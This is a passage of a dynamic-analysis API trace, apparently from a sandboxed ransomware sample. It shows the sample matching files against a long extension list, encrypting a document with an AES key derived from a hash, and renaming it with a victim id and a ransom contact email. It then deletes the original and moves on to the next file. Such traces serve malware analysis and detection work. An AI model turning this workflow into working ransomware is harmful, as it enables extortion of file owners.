dt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ppt") returned=".ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0188.118] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0188.118] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0188.118] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\kipouqk1rgay1fz.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\kipouqk1rgay1fz.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0188.143] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xd5df, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0xd5df, lpOverlapped=0x0) returned 1
	[0188.147] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.147] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcaef0) returned 1
	[0188.149] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.149] CryptCreateHash (in: hProv=0xfcaef0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0188.149] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.149] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0188.150] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.150] CryptDeriveKey (in: hProv=0xfcaef0, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb8ef0) returned 1
	[0188.150] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.150] CryptEncrypt (in: hKey=0xfb8ef0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0xd5df, dwBufLen=0xd5df | out: pbData=0x0*, pdwDataLen=0x18af1c*=0xd5e0) returned 1
	[0188.154] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.154] RtlMoveMemory (in: Destination=0xfea768, Source=0xfdd180, Length=0xd5df | out: Destination=0xfea768) 
	[0188.154] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.154] CryptEncrypt (in: hKey=0xfb8ef0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfea768*, pdwDataLen=0x18aefc*=0xd5df, dwBufLen=0xd5e0 | out: pbData=0xfea768*, pdwDataLen=0x18aefc*=0xd5e0) returned 1
	[0188.154] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.154] CryptDestroyKey (hKey=0xfb8ef0) returned 1
	[0188.155] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.155] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0188.155] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.155] CryptReleaseContext (hProv=0xfcaef0, dwFlags=0x0) returned 1
	[0188.155] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.155] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0188.156] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.156] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0188.157] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\kipouqk1rgay1fz.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 113
	[0188.157] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\kipouqk1rgay1fz.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\kipouqk1rgay1fz.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0188.158] WriteFile (in: hFile=0x388, lpBuffer=0xfea768*, nNumberOfBytesToWrite=0xd5e0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfea768*, lpNumberOfBytesWritten=0x18b358*=0xd5e0, lpOverlapped=0x0) returned 1
	[0188.163] CloseHandle (hObject=0x388) returned 1
	[0188.163] CloseHandle (hObject=0x2c0) returned 1
	[0188.163] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\kipouqk1rgay1fz.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\kipouqk1rgay1fz.ppt")) returned 1
	[0188.170] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\kipouqk1rgay1fz.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\kipouqk1rgay1fz.ppt")) returned 0
	[0188.170] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x260dee70, ftCreationTime.dwHighDateTime=0x1d968ca, ftLastAccessTime.dwLowDateTime=0x32914f0, ftLastAccessTime.dwHighDateTime=0x1d96e85, ftLastWriteTime.dwLowDateTime=0x32914f0, ftLastWriteTime.dwHighDateTime=0x1d96e85, nFileSizeHigh=0x0, nFileSizeLow=0x9e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="nYJ-jZKLJ.odp", cAlternateFileName="NYJ-JZ~1.ODP")) returned 1
	[0188.170] lstrcmpW (lpString1="nYJ-jZKLJ.odp", lpString2="..") returned 1
	[0188.171] lstrcmpW (lpString1="nYJ-jZKLJ.odp", lpString2=".") returned 1
	[0188.171] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\"
	[0188.171] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\", lpString2="nYJ-jZKLJ.odp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\nYJ-jZKLJ.odp") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\nYJ-jZKLJ.odp"
	[0188.171] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\nYJ-jZKLJ.odp") returned 65
	[0188.171] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0188.171] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\nYJ-jZKLJ.odp", cchLength=0x41 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\nyj-jzklj.odp") returned 0x41
	[0188.171] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.171] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\nyj-jzklj.odp", lpSrch="help_decrypt_your_files") returned 0x0
	[0188.172] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\nyj-jzklj.odp" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\nyj-jzklj.odp") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\nyj-jzklj.odp"
	[0188.172] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\nyj-jzklj.odp") returned 65
	[0188.172] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.172] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.172] StrStrW (lpFirst=".odp", lpSrch=".") returned=".odp"
	[0188.172] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.173] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".odp") 